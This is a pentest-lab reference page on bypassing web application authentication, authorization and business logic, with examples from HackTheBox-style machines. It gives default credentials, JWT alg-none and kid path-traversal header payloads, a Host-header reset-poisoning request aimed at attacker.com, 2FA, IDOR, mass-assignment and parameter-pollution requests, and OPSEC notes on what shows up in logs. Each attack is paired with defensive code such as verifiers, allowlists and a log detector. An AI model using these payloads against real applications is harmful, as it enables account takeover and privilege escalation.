
Application Bypass Techniques

# Overview

Application bypass techniques target authentication, authorization, and business logic flaws in web applications and APIs. Unlike CVE exploits that target known code vulnerabilities, these techniques exploit design flaws, weak implementation patterns, and insecure default configurations. They are commonly used to escalate privileges from low-privilege user to administrator, or to bypass multi-factor authentication controls.

# Prerequisites

  • BurpSuite or OWASP ZAP for intercepting and modifying HTTP requests
  • jwt_tool, jwt-cracker for JWT analysis
  • Custom scripts for automated parameter manipulation

# Techniques

## 1. Default Credential Databases

Always test default credentials before attempting sophisticated attacks:

```bash
# Common web application defaults
# Jenkins:     (no auth by default), admin/admin
# Tomcat:      tomcat/tomcat, admin/admin
# phpMyAdmin:  root/(blank)
# WordPress:   admin/password
# Drupal:      admin/admin
# Joomla:      admin/admin
# TinyFileManager: admin/admin@123
```

Jeeves featured a Jenkins server without authentication. Tiny File Manager on Soccer used admin:admin@123.

## 2. JWT Manipulation

JSON Web Tokens are common in API authentication and can be manipulated:

### Algorithm Confusion ("alg": "none")

```bash
# Decode the JWT payload: https://jwt.io, or locally. The segments are base64url
# without padding, so translate the alphabet and restore padding before base64 -d.
payload=$(echo "<jwt_token>" | cut -d '.' -f2 | tr '_-' '/+')
case $(( ${#payload} % 4 )) in 2) payload="${payload}==" ;; 3) payload="${payload}=" ;; esac
echo "$payload" | base64 -d 2>/dev/null

# If server accepts "none" algorithm, modify header:
# {"alg":"none","typ":"JWT"}
# and remove the signature (keep trailing dot)
```

Test with jwt_tool:

```bash
python3 jwt_tool.py <token> -X a
```

### JWT Key Cracking

```bash
python3 jwt_tool.py <token> -C -d /usr/share/wordlists/rockyou.txt
hashcat -m 16500 jwt_hash.txt /usr/share/wordlists/rockyou.txt
```

### KID Injection

If the JWT header contains a kid (Key ID) parameter and the server reads keys from files, path traversal may allow arbitrary key selection:

```json
{"alg":"HS256","typ":"JWT","kid":"../../../dev/null"}
```

Sign with an empty (or known) key.
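All three JWT weaknesses above come down to the verifier trusting fields in the token header. The following added example (not from the original page or from jwt_tool) is a stdlib-only HS256 verifier that pins the algorithm server-side, resolves `kid` through an allowlisted key store rather than a file path, and compares the MAC in constant time; the key store, the `mint` helper and the token contents are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
import re
from typing import Optional

# Constructed key store (kid -> HMAC secret). Keys are resolved by dictionary
# lookup only; the untrusted "kid" header never becomes part of a file path.
KEYS = {"2024-01": b"constructed-demo-secret-replace-with-32-random-bytes"}
KID_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")
EXPECTED_ALG = "HS256"          # pinned server-side, never read from the token

def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def b64url_decode(seg: str) -> bytes:
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))

def mint(payload: dict, key: bytes, kid: str, alg: str = "HS256") -> str:
    """Test helper: mints a token; alg is overridable only so a bad token can be built."""
    enc = lambda obj: b64url_encode(json.dumps(obj, separators=(",", ":")).encode())
    header = {"alg": alg, "typ": "JWT", "kid": kid}
    signing_input = enc(header) + "." + enc(payload)
    if alg == "none":
        return signing_input + "."                      # unsigned: keep the trailing dot
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)

def verify(token: str, keys: dict = KEYS) -> Optional[dict]:
    """Return the payload only if every check passes; any failure returns None."""
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
        if not isinstance(header, dict) or header.get("alg") != EXPECTED_ALG:
            return None                                 # rejects "none" and alg confusion
        kid = header.get("kid")
        if not isinstance(kid, str) or not KID_RE.fullmatch(kid) or kid not in keys:
            return None                                 # allowlisted kid: no traversal possible
        expected = hmac.new(keys[kid], f"{h}.{p}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(s)):
            return None                                 # constant-time MAC comparison
        return json.loads(b64url_decode(p))
    except ValueError:                                  # bad base64, bad JSON, wrong segment count
        return None
```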

## 3. Password Reset Poisoning (Host Header Injection)

Manipulate the Host header in password reset requests to redirect the reset link to an attacker-controlled domain:

```http
POST /forget-password HTTP/1.1
Host: attacker.com
...
email=victim@target.com
```

If the application uses the Host header to construct the reset URL, the victim receives a link pointing to attacker.com containing the valid reset token.
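The fix is to never derive the link from the request. As an added example (not code from the page), this builds the reset URL from a configured canonical origin and refuses requests whose Host header is outside an allowlist; `CANONICAL_ORIGIN`, `ALLOWED_HOSTS` and the `/reset-password` path are assumed values.

```python
from typing import Optional
from urllib.parse import quote

# Constructed settings: the reset link is built from a configured canonical origin.
# The Host / X-Forwarded-Host headers are only ever validated, never used as input.
CANONICAL_ORIGIN = "https://app.example.com"
ALLOWED_HOSTS = {"app.example.com", "www.app.example.com"}

def host_is_trusted(host_header: Optional[str]) -> bool:
    """Allowlist check on a hostname[:port] Host header (IPv6 literal form not handled here)."""
    if not host_header:
        return False
    host = host_header.rsplit(":", 1)[0].strip().lower().rstrip(".")   # drop port, normalise
    return host in ALLOWED_HOSTS

def build_reset_link(host_header: Optional[str], token: str) -> Optional[str]:
    """Return the reset URL, or None when the request should be refused with HTTP 400."""
    if not host_is_trusted(host_header):
        return None
    return f"{CANONICAL_ORIGIN}/reset-password?token={quote(token, safe='')}"
```

Apply the same allowlist to `X-Forwarded-Host` and any other header a proxy may rewrite into the effective host.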

## 4. 2FA Bypass Techniques

```http
# 1. Direct navigation after password login
GET /dashboard HTTP/1.1                    # Bypass 2FA page entirely

# 2. Response manipulation
# Change: {"2fa_required": true} to {"2fa_required": false}

# 3. Parameter removal
# Remove 2fa_code parameter from request body

# 4. Reuse old 2FA tokens
```
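Every one of the four bypasses works only when the second factor is tracked on the client or not enforced on each request. This added example (not from the page) is a minimal server-side session model in which the MFA state lives only in the session, the gate runs on every request, a missing code is a failure rather than a skip, and codes are single-use; the in-memory stores, paths and the out-of-band code delivery are constructed.

```python
import hmac
import secrets
import time
from typing import Optional, Tuple

# Constructed in-memory stores standing in for the server's session backend.
SESSIONS: dict = {}
USED_CODES: set = set()
PUBLIC_PATHS = {"/login", "/2fa"}

def password_login(user: str, password_ok: bool, code: Optional[str] = None) -> Tuple[str, str]:
    """Step 1: a correct password yields a session that is only *partially* authenticated.
    Returns (session_id, code); the code would be delivered out of band (constructed here)."""
    sid = secrets.token_urlsafe(16)
    code = code or f"{secrets.randbelow(10**6):06d}"
    if password_ok:
        SESSIONS[sid] = {"user": user, "mfa_verified": False, "code": code, "code_exp": time.time() + 300}
    return sid, code

def verify_2fa(sid: str, submitted: Optional[str]) -> bool:
    """Step 2: only the server flips mfa_verified. Missing, wrong, expired or reused codes fail."""
    sess = SESSIONS.get(sid)
    if sess is None or sess["mfa_verified"] or not submitted:
        return False                         # parameter removal: nothing to verify, so deny
    if (sess["user"], submitted) in USED_CODES or time.time() > sess["code_exp"]:
        return False                         # replay of an already-consumed or expired code
    if not hmac.compare_digest(submitted.encode(), sess["code"].encode()):
        return False
    USED_CODES.add((sess["user"], submitted))  # single use
    sess["mfa_verified"] = True
    return True

def authorize(sid: Optional[str], path: str) -> int:
    """Gate on every request. The client's view of {"2fa_required": ...} is irrelevant:
    only server-side session state decides, so response manipulation changes nothing."""
    if path in PUBLIC_PATHS:
        return 200
    sess = SESSIONS.get(sid)
    if sess is None:
        return 401
    if not sess["mfa_verified"]:
        return 403                           # direct navigation to /dashboard after password only
    return 200
```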

## 5. Race Conditions (TOCTOU)

Time-of-check to time-of-use vulnerabilities in authentication:

```bash
# Use turbo intruder or custom script to send parallel requests
# Example: coupon code reuse, file upload before extension check, transfer before balance check
```

Synchronize multiple requests so that they all reach the application within the same time window.
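To see why the window exists and how to close it, here is an added example (not from the page) using the coupon-reuse case: a check-then-act redemption next to an atomic conditional UPDATE, both fired by a barrier-synchronised thread pool that plays the role of Turbo Intruder. The SQLite table, coupon code and thread count are constructed.

```python
import sqlite3
import tempfile
import threading
import time

def make_db() -> str:
    """Constructed demo table: one coupon with a single remaining use."""
    path = tempfile.NamedTemporaryFile(suffix=".db", delete=False).name
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE coupons (code TEXT PRIMARY KEY, uses INTEGER NOT NULL)")
    con.execute("INSERT INTO coupons VALUES ('SAVE10', 1)")
    con.commit()
    con.close()
    return path

def redeem_racy(path: str, code: str) -> bool:
    """Vulnerable check-then-act: SELECT and UPDATE run as separate autocommit statements."""
    con = sqlite3.connect(path, isolation_level=None)
    (uses,) = con.execute("SELECT uses FROM coupons WHERE code = ?", (code,)).fetchone()
    if uses <= 0:
        con.close()
        return False
    time.sleep(0.02)                      # the TOCTOU window: every racer still sees uses == 1
    con.execute("UPDATE coupons SET uses = uses - 1 WHERE code = ?", (code,))
    con.close()
    return True

def redeem_atomic(path: str, code: str) -> bool:
    """Fixed: one conditional UPDATE lets the database check and decrement atomically."""
    con = sqlite3.connect(path, isolation_level=None)
    cur = con.execute("UPDATE coupons SET uses = uses - 1 WHERE code = ? AND uses > 0", (code,))
    ok = cur.rowcount == 1                # 0 rows affected means another request won the race
    con.close()
    return ok

def hammer(redeem, path: str, n: int = 20) -> int:
    """Release n redemptions simultaneously (what Turbo Intruder does over HTTP); count successes."""
    gate, results = threading.Barrier(n), []
    def worker():
        gate.wait()
        results.append(redeem(path, "SAVE10"))
    threads = [threading.Thread(target=worker) for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results)
```

With `redeem_racy` the coupon is typically redeemed several times and `uses` goes negative; with `redeem_atomic` exactly one request succeeds regardless of timing.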

## 6. Business Logic Flaws

```http
# Negative quantity for price manipulation
POST /cart/add HTTP/1.1
item_id=5&quantity=-1             # Reduce total price

# Excessive parameter submission
POST /api/user/update HTTP/1.1
username=victim&role=admin        # Mass assignment vulnerability
```
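Both flaws are absent when the server validates quantities as business values and binds only the fields a caller may set. This added example (not from the page) shows a cart handler that rejects non-positive quantities and prices from the server-side catalogue, and a profile update that allowlists writable fields so `role=admin` is dropped unless the actor is an admin; the catalogue, field names and limits are constructed.

```python
from typing import Optional, Tuple, List

# Constructed server-side data; the client never supplies prices or roles.
CATALOGUE = {5: 19.99, 7: 4.50}
MAX_QTY = 100
USER_WRITABLE = {"display_name", "email"}     # self-service allowlist; "role" is deliberately absent

def add_to_cart(cart: dict, item_id: int, quantity) -> Optional[float]:
    """Accept only a positive integer quantity within limits; return the recomputed total or None."""
    try:
        qty = int(str(quantity))                # "-1" parses but fails the range check; "abc", "" fail here
    except ValueError:
        return None
    if not 1 <= qty <= MAX_QTY or item_id not in CATALOGUE:
        return None
    cart[item_id] = cart.get(item_id, 0) + qty
    return round(sum(CATALOGUE[i] * q for i, q in cart.items()), 2)

def update_user(user: dict, submitted: dict, actor_is_admin: bool = False) -> Tuple[dict, List[str]]:
    """Bind only allowlisted fields (mass-assignment defence); role changes need an admin actor.
    Returns the updated record and the list of rejected field names for audit logging."""
    rejected = []
    for field, value in submitted.items():
        if field in USER_WRITABLE or (actor_is_admin and field == "role"):
            user[field] = value
        else:
            rejected.append(field)
    return user, rejected
```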

## 7. Insecure Direct Object References (IDOR)

```http
GET /api/user/1234/profile               # Access your own profile
GET /api/user/1/profile                  # Try admin user ID (IDOR)
GET /api/invoice/2024-001                # Sequential ID enumeration
```
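The OPSEC note below observes that IDOR enumeration leaves a sequential access pattern. As an added example (not from the page), this detection routine runs over a constructed access log in an assumed `timestamp ip user=<id> METHOD path status` format and flags principals that touch several other users' objects, reporting how many requests were denied, how many succeeded (the real IDOR hits) and whether the IDs form a consecutive run.

```python
import re
from collections import defaultdict

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<ip>\S+) user=(?P<uid>\d+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3})$")
OBJECT_RE = re.compile(r"^/api/user/(?P<oid>\d+)/")

# Constructed access log: principal 1234 walks user IDs 1..5 (one request succeeds);
# principal 77 only touches its own profile and an invoice.
SAMPLE_LOG = """\
2024-05-01T10:00:00Z 203.0.113.5 user=1234 GET /api/user/1234/profile 200
2024-05-01T10:00:01Z 203.0.113.5 user=1234 GET /api/user/1/profile 403
2024-05-01T10:00:01Z 203.0.113.5 user=1234 GET /api/user/2/profile 403
2024-05-01T10:00:02Z 203.0.113.5 user=1234 GET /api/user/3/profile 403
2024-05-01T10:00:02Z 203.0.113.5 user=1234 GET /api/user/4/profile 200
2024-05-01T10:00:03Z 203.0.113.5 user=1234 GET /api/user/5/profile 403
2024-05-01T10:00:05Z 198.51.100.9 user=77 GET /api/user/77/profile 200
2024-05-01T10:00:06Z 198.51.100.9 user=77 GET /api/invoice/2024-001 200
"""

def find_idor_enumeration(log_text: str, min_foreign: int = 3) -> dict:
    """Flag principals that touch >= min_foreign user objects other than their own.
    A 2xx among the 403s is the one to chase: that object was actually exposed."""
    foreign, denied, allowed = defaultdict(set), defaultdict(int), defaultdict(int)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        o = OBJECT_RE.match(m["path"]) if m else None
        if not o or o["oid"] == m["uid"]:
            continue                                 # unparsable, non-user object, or own profile
        foreign[m["uid"]].add(int(o["oid"]))
        if m["status"] in ("401", "403"):
            denied[m["uid"]] += 1
        elif m["status"].startswith("2"):
            allowed[m["uid"]] += 1
    alerts = {}
    for uid, ids in foreign.items():
        if len(ids) >= min_foreign:
            s = sorted(ids)
            alerts[uid] = {"foreign_ids": len(ids), "denied": denied[uid], "succeeded": allowed[uid],
                           "sequential": all(b - a == 1 for a, b in zip(s, s[1:]))}
    return alerts
```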

## 8. Parameter Pollution for Auth Bypass

```http
# Duplicate parameters confuse parsers
POST /login HTTP/1.1
username=victim&password=wrong&password=right

# Array notation
username[0]=admin&password[admin]=test
```
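The bypass depends on two layers reading different values for the same key. This added example (not from the page) reproduces that disagreement with first-wins and last-wins parsers, then shows a strict form parser that rejects duplicate keys, bracket notation and unexpected fields outright so the request is answered with 400 instead of being guessed at; the allowed field names are assumed.

```python
from typing import Optional
from urllib.parse import parse_qsl

# Two layers that disagree on duplicate keys is exactly what parameter pollution exploits:
# e.g. a WAF or auth filter that reads the first value while the application reads the last.
def first_wins(body: str) -> dict:
    out = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        out.setdefault(key, value)
    return out

def last_wins(body: str) -> dict:
    return dict(parse_qsl(body, keep_blank_values=True))

def parse_form_strict(body: str, allowed: frozenset = frozenset({"username", "password"})) -> Optional[dict]:
    """Hardened parser: one value per key, only expected fields, no bracket/array notation.
    Returns None so the caller can answer 400 instead of guessing which value was meant."""
    seen = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        if key not in allowed or key in seen:
            return None          # unknown key (covers username[0], password[admin]) or duplicate
        seen[key] = value
    return seen
```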

# Common Pitfalls

  • JWT "none" algorithm attacks only work if the server library explicitly allows it -- most modern libraries reject "none" by default
  • Host header injection requires the application to trust the Host header for URL generation -- test with actual valid emails to confirm
  • Rate limiting may block automated testing -- use delays between requests

# OPSEC Considerations

  • Repeated 401/403 responses are visible in application logs
  • Password reset poisoning generates emails that may alert users and SOC teams
  • IDOR enumeration creates sequential access patterns that anomaly detection can flag

# Post-Exploitation Value

  • Admin access to web applications provides data access and potential RCE through admin panels
  • JWT key compromise allows forging tokens for any user indefinitely
  • Password reset tokens may provide account takeover without any credential knowledge

# Cross-References

## Tool References

| Tool | Link |
| --- | --- |
| jwt_tool | https://github.com/ticarpi/jwt_tool |
| BurpSuite | https://portswigger.net/burp |
| OWASP ZAP | https://www.zaproxy.org/ |

## Source Machines

  • Intentions (Hard, Linux) - API manipulation and auth bypass
  • Editorial (Easy, Linux) - Access control bypass